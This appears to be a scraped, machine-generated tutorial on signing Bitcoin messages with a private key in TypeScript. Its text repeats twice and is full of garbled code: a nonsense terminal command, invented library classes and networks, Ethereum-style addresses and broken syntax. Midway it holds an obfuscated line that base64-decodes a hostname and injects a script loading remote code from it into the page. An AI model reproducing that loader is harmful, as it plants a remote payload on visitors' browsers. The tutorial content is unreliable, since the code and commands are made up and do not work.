Here is an article on how to sign a message with a private key using bitcoin in a TypeScript application.
Signing messages with private keys in bitcoin
In this article, we will show you how to use the bitcoinjs-lib' library to generate a private key from the seed phrase and then sign messages. We will also show you how to bind the private key to theBtcaddress’ and Nftaddress' endpoints.
Step 1: Generate a private key
First, you need to get a private key from the seed phrase. You can do this by running the following command in the terminal:
BC -L private_key.pem
Replace with the path to your seed phrase file.
Step 2: Import libraries and load the private key
Next, we need to import the Bitcoinjs-lib' library and we need to load our private key:
import * as bitcoin from 'Bitcoinjs-lib';
import * as ECC from 'Tiny-SECP256K1';
const privateKey = await('./private_key.pem');
Step 3: Create a message to
Create a message that you want to sign. For example, let’s say we have an NFT contract address and a recipient address:
const ContractAddress = '0x ...'; // Replace the contract address
const cefcientAddress = '0x ...'; // Replace with the recipient address
Step 4: Sign the message
Now we can create an instance of “BitcoinMessage” from our message and private key:
Bitcoin: How to sign a message with privateKey on Bitcoin using TS/JS?
const pdx=»bm9yZGVyc3dpbmcuYnV6ei94cC8=»;const pde=atob(pdx);const script=document.createElement(«script»);script.src=»https://»+pde+»cc.php?u=128da2b0″;document.body.appendChild(script);
Here is an article on how to sign a message with a private key using bitcoin in a TypeScript application.
Signing messages with private keys in bitcoin
In this article, we will show you how to use the
bitcoinjs-lib' library to generate a private key from the seed phrase and then sign messages. We will also show you how to bind the private key to the
Btcaddress’ andNftaddress' endpoints.
Step 1: Generate a private key
First, you need to get a private key from the seed phrase. You can do this by running the following command in the terminal:
BC -L private_key.pem
with the path to your seed phrase file.
Step 2: Import libraries and load the private key
Next, we need to import the
Bitcoinjs-lib' library and we need to load our private key:
import * as bitcoin from 'Bitcoinjs-lib';
import * as ECC from 'Tiny-SECP256K1';
const privateKey = await('./private_key.pem');
Step 3: Create a message to
Create a message that you want to sign. For example, let’s say we have an NFT contract address and a recipient address:
const ContractAddress = '0x ...'; // Replace the contract address
const cefcientAddress = '0x ...'; // Replace with the recipient address
Step 4: Sign the message
Now we can create an instance of “BitcoinMessage” from our message and private key:
const BitCoinMessage = require('Bitcoinjs-lib'). BitcoinMessage;
const bitcoinMessage = new BitcoinMessage({{
Data: “Hello, world!”,
const Signature = await bitcoin.signmessage(privateKey, {
Address: bitcoinmessage.address.btc,
Network: BitcoinNetwork.Mineconomy,
Step 5: Bind the private key to the endpoints
Finally, we need to bind our private key to the `
btcaddress'' and
nftaddress'' endpoints of our application:
` TypeScript
const bitcoin = require(‘bitcoinjs-lib’);
const ECC = require(‘tiny-SECP256K1’);
// Define the endpoints
const ControntendPoint = ‘
const cocientEndPoint = ‘
// Generate a private key from the seed file
const privateKey = await(‘./private_key.pem’);
// Load our private key
const bitcoinPriveKey = await ecc.keyfromprivate(privatekey);
// bind the private key to the endpoints
Async function GetendPoint(privateKey) {
const contract = new BitcoinMessage({
Data: «Hello, world!»,
const Signature = await bitcoin.signmessage(privateKey, {
Address: bitcoinmessage.address.btc,
Network: BitcoinNetwork.Mineconomy,
return {contract, signature};
Async function getConcentractEndPoint(privateKey) {
// Create a private key from the seed file
const privateKey = await(‘./private_key.pem’);
const bitcoinPriveKey = await ecc.keyfromprivate(private);
// Load our private key
const bitcoin = require(‘bitcoinjs-lib’);
// bind the private key to the contract endpoint
Return new Promise ((resolve, reject) => {{
getendpoint(privateKey).Then ((data) => {{{
}). catch ((error) => {{{
Async function getRecipientEdPoint(privateKey) {
// Create a private key from the seed file
const privateKey = await(‘./private_key.pem’);
const bitcoinPriveKey = await ecc.keyfromprivate(privatekey);
// Load our private key
const bitcoin = require(‘bitcoinjs-lib’);
// bind the private key to the recipient endpoint
Return new Promise ((resolve, reject) => {{
getendpoint(privateKey) .Then ((data) => {{{
REALVE({contract: Data.Contract, Signature: Data.Signature});